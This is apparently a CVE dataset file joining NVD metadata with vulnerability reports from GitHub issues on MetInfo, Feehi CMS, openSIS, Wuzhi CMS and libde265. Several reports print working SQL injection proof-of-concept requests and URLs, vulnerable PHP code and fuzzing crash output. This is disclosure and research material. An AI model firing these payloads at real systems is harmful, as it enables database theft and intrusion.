{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/T3qui1a/metinfo_sqlinjection/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/T3qui1a/metinfo_sqlinjection/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:metinfo:metinfo:7.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "65A2CB16-CC11-4C8B-9CCC-7241BDD92E0C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/T3qui1a/metinfo_sqlinjection/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "T3qui1a", "metinfo_sqlinjection" ]
Vulnerability Name: Metinfo7.0 CMS Background SQL Blind Injection Product Homepage: https://www.metinfo.cn/ Software link: https://u.mituo.cn/api/metinfo/download/7.0.0beta Version: V7.0.0 ## Vulnerability code logs/index.class.php line32-line45 ![image](https://user-images.githubusercontent.com/17540142/69960118-aa289580-1543-11ea-9f95-ec4ff736644b.png) the parameter "id" can be inject ![image](https://user-images.githubusercontent.com/17540142/69960342-320e9f80-1544-11ea-9ffb-59e6ccdb9491.png) ## payload: ``` POST /MetInfo7.0.0/admin/?n=logs&c=index&a=dodel HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 22 Connection: close Referer: http://localhost/MetInfo7.0.0/admin/ Cookie: PHPSESSID=01b80466de9751fc3c1cfc72f0950804; Hm_lvt_520556228c0113270c0c772027905838=1575270458; Hm_lpvt_520556228c0113270c0c772027905838=1575288807; admin_lang=cn; arrlanguage=metinfo; re_url=http%3A%2F%2Flocalhost%2FMetInfo7.0.0%2Fadmin%2F; met_auth=a5ccEpa7pIj9%2Bu1jgKVK%2FoV%2F4ng%2FZE4q1NHoa6WWp04qmc3I2NaeVmyVxLjrxEyfOGQU%2FJ2nMcC8WlNiLixs9tGPsw; met_key=AneTFuY; page_iframe_url=http%3A%2F%2Flocalhost%2FMetInfo7.0.0%2Findex.php%3Flang%3Dcn%26pageset%3D1 id[0]=123 and sleep(5) ```
Metinfo7.0 SQL Blind Injection
https://api.github.com/repos/T3qui1a/metinfo_sqlinjection/issues/1/comments
0
2019-12-02T12:43:03Z
2019-12-04T08:37:57Z
https://github.com/T3qui1a/metinfo_sqlinjection/issues/1
531,103,630
1
2,489
CVE-2020-21322
2021-09-15T22:15:09.030
An arbitrary file upload vulnerability in Feehi CMS v2.0.8 and below allows attackers to execute arbitrary code via a crafted PHP file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/liufee/cms/issues/44" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/liufee/cms/issues/44" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:feehi:feehicms:*:*:*:*:*:*:*:*", "matchCriteriaId": "E6A5F1DC-0513-4727-A616-CA59B96FCD2B", "versionEndExcluding": null, "versionEndIncluding": "2.0.8", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/liufee/cms/issues/44
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "liufee", "cms" ]
In the background, you can upload the PHP file by changing the image suffix to PHP, resulting in command execution. url:http://192.168.18.143/admin/index.php?r=admin-user%2Fupdate-self ![image](https://user-images.githubusercontent.com/50048558/68270629-dfeb7300-0098-11ea-9e5b-0e43c178498d.png) ![image](https://user-images.githubusercontent.com/50048558/68270658-feea0500-0098-11ea-86aa-599724f4fd5c.png) ![image](https://user-images.githubusercontent.com/50048558/68270662-05787c80-0099-11ea-8260-3ad9c6389d36.png)
File upload command execution
https://api.github.com/repos/liufee/cms/issues/44/comments
1
2019-11-06T05:26:30Z
2019-12-24T15:55:04Z
https://github.com/liufee/cms/issues/44
518,246,630
44
2,490
CVE-2021-27340
2021-09-16T14:15:07.410
OpenSIS Community Edition version <= 7.6 is affected by a reflected XSS vulnerability in EmailCheck.php via the "opt" parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/commit/f78407d5291c686c3f416073dcb9143f3a3d5489#diff-24b751f2072f058259d033016938101f9fa29884ebcc09ce7eb88def3421e5ba" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/158" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/releases" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/commit/f78407d5291c686c3f416073dcb9143f3a3d5489#diff-24b751f2072f058259d033016938101f9fa29884ebcc09ce7eb88def3421e5ba" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/158" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/releases" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:os4ed:opensis:*:*:*:*:community:*:*:*", "matchCriteriaId": "98FDC0EF-5711-4412-BF52-3A1D17AA8067", "versionEndExcluding": null, "versionEndIncluding": "7.6", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/OS4ED/openSIS-Classic/issues/158
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "OS4ED", "openSIS-Classic" ]
Hi OS4ED Team! I believe I've discovered a reflected XSS and a local file inclusion vulnerability in openSIS V7.6. I don't think they have been reported yet. Since I feel like the 2 vulnerabilities are relatively impactful, I've sent the detail and the POC in an email to info@os4ed.com last week. Is that the correct place to report it? Thanks in advance!
Possible new vulnerabilities in V7.6
https://api.github.com/repos/OS4ED/openSIS-Classic/issues/158/comments
3
2021-02-22T16:47:11Z
2021-07-25T01:39:18Z
https://github.com/OS4ED/openSIS-Classic/issues/158
813,672,744
158
2,492
CVE-2021-40669
2021-09-16T19:15:07.870
SQL Injection vulnerability exists in Wuzhi CMS 4.1.0 via the keywords parameter under the coreframe/app/promote/admin/index.php file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/196" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/196" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wuzhicms:wuzhicms:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2B76E69A-B2F3-4359-A7C0-046CEE2FAEEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/wuzhicms/wuzhicms/issues/196
[ "Exploit", "Third Party Advisory" ]
github.com
[ "wuzhicms", "wuzhicms" ]
## Vulnerability file: `/coreframe/app/promote/admin/index.php:42-60` ```php public function search() { $siteid = get_cookie('siteid'); $page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1; $page = max($page,1); $fieldtype = $GLOBALS['fieldtype']; $keywords = $GLOBALS['keywords']; if($fieldtype=='place') { $where = "`siteid`='$siteid' AND `name` LIKE '%$keywords%'"; echo $where; $result = $this->db->get_list('promote_place', $where, '*', 0, 50,$page,'pid ASC'); $pages = $this->db->pages; $total = $this->db->number; include $this->template('listingplace'); } else { $where = "`siteid`='$siteid' AND `$fieldtype` LIKE '%$keywords%'"; $result = $this->db->get_list('promote',$where, '*', 0, 20,$page,'id DESC'); $pages = $this->db->pages; $total = $this->db->number; include $this->template('listing'); } } ``` The `$fieldtype` parameter is controllable and the direct filtering of the `$keywords` parameter is not rigorous. ## POC ``` /index.php?m=promote&f=index&_su=wuzhicms&v=search&fieldtype=place&keywords=1111%'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- - ``` ![image-20210905220110773](https://gitee.com/taochiyu/blogimage/raw/master/img/20210905220110.png) ![image-20210905220051058](https://gitee.com/taochiyu/blogimage/raw/master/img/20210905220051.png)
Wuzhicms v4.1.0 /coreframe/app/promote/admin/index.php hava a SQL Injection Vulnerability
https://api.github.com/repos/wuzhicms/wuzhicms/issues/196/comments
0
2021-09-05T14:05:26Z
2021-09-05T14:05:26Z
https://github.com/wuzhicms/wuzhicms/issues/196
988,517,784
196
2,493
CVE-2021-40670
2021-09-16T19:15:07.977
SQL Injection vulnerability exists in Wuzhi CMS 4.1.0 via the keywords iparameter under the /coreframe/app/order/admin/card.php file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/197" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/197" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wuzhicms:wuzhicms:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2B76E69A-B2F3-4359-A7C0-046CEE2FAEEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/wuzhicms/wuzhicms/issues/197
[ "Exploit", "Third Party Advisory" ]
github.com
[ "wuzhicms", "wuzhicms" ]
## Vulnerability file: `/coreframe/app/order/admin/card.php:21-45` ```php public function listing() { $page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1; $page = max($page,1); $batchid = isset($GLOBALS['batchid']) ? $GLOBALS['batchid'] : 0; $keytype = isset($GLOBALS['keytype']) ? $GLOBALS['keytype'] : 0; $keywords = isset($GLOBALS['keywords']) ? trim($GLOBALS['keywords']) : ''; $where = $batchid ? "`batchid`='$batchid'" : ''; if($keytype==0 && $keywords) { $where = "card_no LIKE '$keywords%'"; } elseif($keytype==1 && $keywords) { $r = $this->db->get_one('member', array('username' => $keywords)); if($r) { $uid = $r['uid']; $where = "uid = '$uid'"; } else { MSG('用户不存在',HTTP_REFERER); } } $result = $this->db->get_list('order_card', $where, '*', 0, 20,$page,'cardid DESC'); $pages = $this->db->pages; $total = $this->db->number; $status_arr = array('<b>待发送</b>','未预约','已预约'); include $this->template('card_listing'); } ``` In the `card.php` file, the `$keytype` parameter and the `$keywords` parameter under the `listing` method are controllable, and the `$keywords` parameter is not strictly filtered, causing SQL injection vulnerabilities! ## POC ``` /index.php?m=order&f=card&_su=wuzhicms&v=listing&keytype=0&keywords=11111'/**/and/**/1=1/**/union/**/SELECT/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- - ``` ![image-20210906104115767](https://gitee.com/taochiyu/blogimage/raw/master/img/20210906104115.png) ![image-20210906104220567](https://gitee.com/taochiyu/blogimage/raw/master/img/20210906104220.png)
Wuzhicms v4.1.0 /coreframe/app/order/admin/card.php hava a SQL Injection Vulnerability
https://api.github.com/repos/wuzhicms/wuzhicms/issues/197/comments
0
2021-09-06T02:43:30Z
2021-09-06T02:59:23Z
https://github.com/wuzhicms/wuzhicms/issues/197
988,686,922
197
2,494
CVE-2020-21594
2021-09-16T22:15:07.587
libde265 v1.0.4 contains a heap buffer overflow in the put_epel_hv_fallback function, which can be exploited via a crafted a file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/233" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/233" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "4F5331C0-3C70-42CB-AC2C-4E8B7FA1328F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/strukturag/libde265/issues/233
[ "Exploit", "Third Party Advisory" ]
github.com
[ "strukturag", "libde265" ]
# heap-buffer-overflow in put_epel_hv_fallback when decoding file I found some problems during fuzzing ## Test Version dev version, git clone https://github.com/strukturag/libde265 ## Test Environment root@ubuntu:~# lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial ## Test Configure ./configure configure: --------------------------------------- configure: Building dec265 example: yes configure: Building sherlock265 example: no configure: Building encoder: yes configure: --------------------------------------- ## Test Program `dec265 [infile]` ## Asan Output ``` root@ubuntu:~# /opt/asan/bin/dec265 libde265-put_epel_hv_fallback-heap_overflow.crash WARNING: pps header invalid ================================================================= ==51241==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62f00001c3b8 at pc 0x0000004354cc bp 0x7fffea7fb3d0 sp 0x7fffea7fb3c0 READ of size 2 at 0x62f00001c3b8 thread T0 #0 0x4354cb in void put_epel_hv_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, int, int, short*, int) /root/src/libde265/libde265/fallback-motion.cc:348 #1 0x52c1cc in acceleration_functions::put_hevc_epel_v(short*, long, void const*, long, int, int, int, int, short*, int) const ../libde265/acceleration.h:318 #2 0x52ebed in void mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) /root/src/libde265/libde265/motion.cc:264 #3 0x51fb8b in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /root/src/libde265/libde265/motion.cc:390 #4 0x52b8f9 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2107 #5 0x478f4a in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/slice.cc:4137 #6 0x47a7d3 in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4496 #7 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647 #8 0x47b53f in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4630 #9 0x47b5ac in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4633 #10 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861 #11 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736 #12 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049 #13 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843 #14 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945 #15 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730 #16 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688 #17 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #18 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #19 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #20 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #21 0x7f5bb73aa82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #22 0x402b28 in _start (/opt/asan/bin/dec265+0x402b28) 0x62f00001c3b8 is located 72 bytes to the left of 50704-byte region [0x62f00001c400,0x62f000028a10) allocated by thread T0 here: #0 0x7f5bb82ab076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076) #1 0x43e00d in ALLOC_ALIGNED /root/src/libde265/libde265/image.cc:54 #2 0x43e725 in de265_image_get_buffer /root/src/libde265/libde265/image.cc:132 #3 0x440639 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) /root/src/libde265/libde265/image.cc:384 #4 0x43afa4 in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) /root/src/libde265/libde265/dpb.cc:262 #5 0x40ee8b in decoder_context::generate_unavailable_reference_picture(seq_parameter_set const*, int, bool) /root/src/libde265/libde265/decctx.cc:1418 #6 0x411722 in decoder_context::process_reference_picture_set(slice_segment_header*) /root/src/libde265/libde265/decctx.cc:1648 #7 0x414cc9 in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) /root/src/libde265/libde265/decctx.cc:2066 #8 0x40acad in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:639 #9 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #10 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #11 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #12 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #13 0x7f5bb73aa82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow /root/src/libde265/libde265/fallback-motion.cc:348 void put_epel_hv_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, int, int, short*, int) Shadow bytes around the buggy address: 0x0c5e7fffb820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5e7fffb830: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5e7fffb840: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5e7fffb850: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5e7fffb860: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c5e7fffb870: fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa 0x0c5e7fffb880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5e7fffb890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5e7fffb8a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5e7fffb8b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5e7fffb8c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==51241==ABORTING ``` ## POC file [libde265-put_epel_hv_fallback-heap_overflow.zip](https://github.com/leonzhao7/vulnerability/blob/master/libde265-put_epel_hv_fallback-heap_overflow.zip) [libde265-put_epel_hv_fallback-heap_overflow2.zip](https://github.com/leonzhao7/vulnerability/blob/master/libde265-put_epel_hv_fallback-heap_overflow2.zip) password: leon.zhao.7 ## CREDIT Zhao Liang, Huawei Weiran Labs
heap-buffer-overflow in put_epel_hv_fallback when decoding file
https://api.github.com/repos/strukturag/libde265/issues/233/comments
4
2019-12-24T08:25:45Z
2023-01-24T17:42:58Z
https://github.com/strukturag/libde265/issues/233
542,042,456
233
2,495
CVE-2020-21595
2021-09-16T22:15:07.697
libde265 v1.0.4 contains a heap buffer overflow in the mc_luma function, which can be exploited via a crafted a file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
